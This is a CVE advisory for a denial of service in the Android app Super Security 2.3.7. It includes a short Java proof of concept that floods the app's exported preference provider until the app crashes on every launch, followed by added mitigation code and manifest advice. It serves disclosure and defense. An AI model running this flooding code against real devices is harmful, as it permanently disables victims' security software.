Denial of Service exists in Super Security (CVE-2023-27191)
Vendor: DUALSPACE (http://www.dualspace.com/pc/en/products.html)
Affected product: Super Security (com.ludashi.security)
Version: 2.3.7
Download link: https://apkpure.com/cn/super-security-virus-cleaner/com.ludashi.security
Description of the vulnerability for use in the CVE: An issue found in DUALSPACE Super Security v.2.3.7 allows an attacker to cause a denial of service via the SharedPreference files.
Additional information: The Super Security app is a security application that offers several security-related functions. Upon opening, the app loads its SharedPreference files into memory. If a malicious app injects a large amount of data into these files, the Super Security app loads excessive data into memory, which can trigger an out-of-memory (OOM) error and crash the app. Even worse, simply restarting the app does not fix the issue, because the injected data persists in the SharedPreference files. In practice, this means that the Super Security app becomes unable to launch successfully.
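PoC:
    import android.content.ContentResolver;
    import android.content.ContentValues;
    import android.net.Uri;

    // Method of a component in the calling app (it relies on this.getApplicationContext()).
    public void attack() {
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.ludashi.security.SharedPrefProvider");
        ContentValues contentValues = new ContentValues();
        // Loop forever, writing entries into the "__default__" preference file through the provider.
        while (true) {
            contentValues.put("file_name", "__default__");
            contentValues.put("type", 4);
            // RandomString is a placeholder in the original PoC and is not defined on this page.
            contentValues.put("key", RandomString);
            contentValues.put("value", RandomString);
            contentResolver.insert(uri, contentValues);
        }
    }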
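
A provider-side mitigation for the write path shown in the PoC, as an added example that is not code from Super Security or from the original report: the insert handler rejects callers from other apps and bounds what can be stored. The class name GuardedPrefProvider, the three limits, and the handling of every value as a string are assumptions; the column names are the ones used in the PoC.

```java
import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.Context;
import android.content.SharedPreferences;
import android.database.Cursor;
import android.net.Uri;
import android.os.Binder;
import android.os.Process;

// Hypothetical hardened provider: name, limits and string-only values are assumptions.
public class GuardedPrefProvider extends ContentProvider {
    private static final int MAX_KEY_CHARS = 128;     // assumed limit
    private static final int MAX_VALUE_CHARS = 4096;  // assumed limit
    private static final int MAX_ENTRIES = 512;       // assumed limit

    @Override
    public boolean onCreate() { return true; }

    @Override
    public Uri insert(Uri uri, ContentValues values) {
        // Only code running under this app's own UID may write preferences.
        if (Binder.getCallingUid() != Process.myUid()) {
            throw new SecurityException("cross-app writes are not allowed");
        }
        if (values == null) throw new IllegalArgumentException("no values");
        String file = values.getAsString("file_name");
        String key = values.getAsString("key");
        String value = values.getAsString("value");
        if (file == null || key == null || value == null
                || key.length() > MAX_KEY_CHARS || value.length() > MAX_VALUE_CHARS) {
            throw new IllegalArgumentException("missing or oversized field");
        }
        SharedPreferences prefs = getContext().getSharedPreferences(file, Context.MODE_PRIVATE);
        // Bound growth of the file: refuse new keys once the entry cap is reached.
        if (!prefs.contains(key) && prefs.getAll().size() >= MAX_ENTRIES) {
            throw new IllegalStateException("preference file is full");
        }
        prefs.edit().putString(key, value).apply();
        return uri;
    }

    // Read, update and delete paths are outside the scope of this example.
    @Override public Cursor query(Uri u, String[] p, String s, String[] a, String o) { return null; }
    @Override public String getType(Uri u) { return null; }
    @Override public int update(Uri u, ContentValues v, String s, String[] a) { return 0; }
    @Override public int delete(Uri u, String s, String[] a) { return 0; }
}
```

Declaring the provider with android:exported="false" in the manifest closes the same path declaratively; the UID check and size caps then act as defense in depth.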